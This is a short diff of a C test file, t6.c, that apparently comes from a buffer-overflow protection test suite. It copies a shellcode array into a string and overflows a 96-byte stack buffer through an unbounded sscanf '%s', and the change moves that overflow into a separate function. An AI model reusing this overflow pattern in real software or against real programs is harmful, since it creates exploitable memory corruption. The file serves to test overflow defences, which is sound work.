@@ -1,6 +1,6 @@
 /*
- * $Name: release2_0-12 $
- * $Id: t6.c,v 1.1 2001/10/08 19:55:17 ttsai Exp $
+ * $Name: release2_0-16 $
+ * $Id: t6.c,v 1.2 2002/06/12 20:30:37 ttsai Exp $
  */
 
 
@@ -35,7 +35,7 @@ char shellcode[] =
 
 char large_string[128];
 
-int main(int ac, char *av[])
+void foo()
 {
     char buffer[96];
     int i;
@@ -52,9 +52,17 @@ int main(int ac, char *av[])
     for (i = 0; i < (int) strlen(shellcode); i++)
 	large_string[i] = shellcode[i];
 
-    printf("&buffer = %p\n", buffer);
-
     sscanf(large_string, "%s", buffer);
 
+    return;
+}
+
+int main(int ac, char *av[])
+{
+    foo();
+
+    printf("If you see this statement, it means that the buffer\n");
+    printf("overflow never occurred.\n");
+
     return 0;
 }
